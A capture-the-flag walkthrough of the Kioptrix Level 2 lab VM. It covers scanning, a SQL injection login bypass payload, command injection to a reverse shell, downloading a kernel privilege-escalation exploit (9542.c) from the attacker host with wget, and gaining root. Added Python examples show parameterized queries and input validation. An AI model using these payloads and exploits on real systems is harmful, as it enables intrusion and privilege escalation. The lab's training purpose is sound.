
Kioptrix 2

Machine Information

Host discovery

The target machine is on my own network, but I do not know its IP address. I started by discovering it with nmap.

nmap -sP 192.168.68.0/24   
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-05 15:37 +08
Nmap scan report for 192.168.68.110
Host is up (0.00038s latency).
MAC Address: 00:0C:29:1D:4E:E5 (VMware)
Nmap scan report for 192.168.68.108
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.92 seconds

Based on the result, there is one IP address identified as VMware. Since the target machine is deployed in VMware, that is the target's IP address.

Information Gathering

Now that I have the IP address, the next step is to look for open ports. This can also be done with nmap.

nmap -p- -A -T4 192.168.68.110                   
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-05 15:38 +08
Nmap scan report for 192.168.68.110
Host is up (0.00062s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            663/udp   status
|_  100024  1            666/tcp   status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
|_ssl-date: 2023-09-05T04:29:05+00:00; -3h09m34s from scanner time.
631/tcp  open  ipp      CUPS 1.1
|_http-server-header: CUPS/1.1
| http-methods: 
|_  Potentially risky methods: PUT
|_http-title: 403 Forbidden
666/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:1D:4E:E5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: -3h09m34s

TRACEROUTE
HOP RTT     ADDRESS
1   0.62 ms 192.168.68.110

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Several interesting ports are open, including port 80, which serves a web application.

Exploiting Port 80

Usually when port 80 is open, I check the service version and try to play around with the web application. After looking into the web application, the main page is a login page.

After trying out the login page, I found that it is vulnerable to SQL injection, and I managed to log in to the web application with the following payload: ' OR 1=1 -- a.
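To show why that payload bypasses the login and how the query should be written instead, here is an added example (not code from the Kioptrix machine or from the original post). It assumes a constructed users table with made-up credentials and uses SQLite in place of the target's MySQL.

```python
import sqlite3

# Constructed stand-in for the web app's user table; the page does not show the
# real schema or credentials, so these values are assumptions.
SAMPLE_USERS = [("admin", "assumed-admin-password"), ("john", "assumed-john-password")]

# The bypass payload seen on the page. MySQL only treats "--" as a comment when it
# is followed by whitespace, which is why the trailing " a" is there.
PAYLOAD = "' OR 1=1 -- a"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Query built by string concatenation: user input becomes SQL syntax.
    With PAYLOAD as the username the WHERE clause collapses to
    username = '' OR 1=1 and the rest of the line is commented out."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query with bound parameters: the payload is compared as a literal."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def demo():
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, PAYLOAD, "anything"),
        "safe": login_safe(conn, PAYLOAD, "anything"),
        "legit_safe": login_safe(conn, "john", "assumed-john-password"),
    }


if __name__ == "__main__":
    print(demo())
```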

After logging in, there is a web console that allows the admin to ping a machine on the network. I played with the web console and the result looked interesting.

Since the result looks exactly like the output of the ping command in a terminal, I tried command injection and confirmed that the console is vulnerable to it.
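The ping console's weakness comes from handing user input to a shell. The following added example (not the machine's or the post's own code) contrasts that pattern with a hardened handler that validates the target as an IP address and runs ping via an argv list; the inputs are constructed and the helper names are mine.

```python
import ipaddress
import subprocess

# Constructed inputs: the normal case and a classic injection attempt.
GOOD_TARGET = "192.168.68.110"
INJECTION = "127.0.0.1; id"


def ping_command_vulnerable(target):
    """The risky pattern: user input concatenated into a shell command string.
    Returned rather than executed so the appended command is visible."""
    return "ping -c 3 " + target


def validate_target(target):
    """Accept only a syntactically valid IPv4/IPv6 address; return None otherwise."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        return None


def ping_argv_safe(target):
    """Build an argv list for a validated address; no shell is ever involved."""
    ip = validate_target(target)
    if ip is None:
        raise ValueError("rejected target: %r" % target)
    return ["ping", "-c", "3", ip]


def run_ping(target):
    """Hardened console handler: validated argv, shell=False, bounded runtime."""
    result = subprocess.run(ping_argv_safe(target), capture_output=True,
                            text=True, timeout=20)
    return result.stdout


def looks_like_injection(target):
    """Log-review helper: shell metacharacters in a 'host' request parameter."""
    return any(ch in target for ch in ";|&`$\n()<>")
```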

Since command injection works, I used it to gain a reverse shell.

nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.68.108] from (UNKNOWN) [192.168.68.110] 32769
sh: no job control in this shell
sh-3.00$ whoami
apache

Once I got a reverse shell, I stabilized it.

sh-3.00$ python -c "import pty;pty.spawn('/bin/bash');"
bash-3.00$ ^Z
zsh: suspended  nc -nvlp 1234
                                                                                                                                                             
┌──(root㉿kali)-[~/tjnull]
└─# stty raw -echo;fg                        
[1]  + continued  nc -nvlp 1234

bash-3.00$ export TERM=xterm
bash-3.00$ 

After stabilizing the shell, I noticed that it is not running as root, which means I need to perform privilege escalation.

Privilege Escalation

For privilege escalation, there are a few things I always check, such as the Linux version, SUID binaries and the list of commands the current user can execute with root privileges. I also used linpeas.sh, as it is one of the most popular privilege escalation scripts.

bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
bash-3.00$ uname 
Linux
bash-3.00$ lsb_release -a
LSB Version:    :core-3.0-ia32:core-3.0-noarch:graphics-3.0-ia32:graphics-3.0-noarch
Distributor ID: CentOS
Description:    CentOS release 4.5 (Final)
Release:        4.5
Codename:       Final

After getting the Linux version, I searched for existing exploits to check whether it is vulnerable.

searchsploit CentOS 4.5        
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Esc | linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Esca | linux_x86/local/9542.c
Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Escalation                                              | linux/local/35370.c
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Based on the result, there is one exploit that matches the Linux version. Since it is a C file, the next step is to get the file and send it to the target machine. I used Python's built-in HTTP server to transfer the file.

searchsploit -m 9542.c 
  Exploit: Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)
      URL: https://www.exploit-db.com/exploits/9542
     Path: /usr/share/exploitdb/exploits/linux_x86/local/9542.c
    Codes: CVE-2009-2698
 Verified: True
File Type: C source, ASCII text
Copied to: /root/9542.c

<attacker machine>
python -m http.server 8081
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...


<target machine>
bash-3.00$ wget 192.168.68.108:8081/9542.c
--00:57:32--  http://192.168.68.108:8081/9542.c
           => `9542.c'
Connecting to 192.168.68.108:8081... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,535 (2.5K) [text/x-csrc]

100%[====================================>] 2,535         --.--K/s             

00:57:32 (77.99 MB/s) - `9542.c' saved [2535/2535]

bash-3.00$ ls
9542.c

Once the target machine has the file, the next thing to do is compile it and run the program.

bash-3.00$ gcc 9542.c -o exploitee
9542.c:109:28: warning: no newline at end of file
bash-3.00$ ls
9542.c  exploitee
bash-3.00$ chmod +x exploitee 
bash-3.00$ ./exploitee 
sh-3.00# whoami
root

After running the program, I successfully gained a root shell on the target machine.

Things I learned from the machine

  • SQL injection
  • Command injection
  • Stabilizing a shell
  • Sending files to the target machine with Python
This post is licensed under CC BY 4.0 by the author.
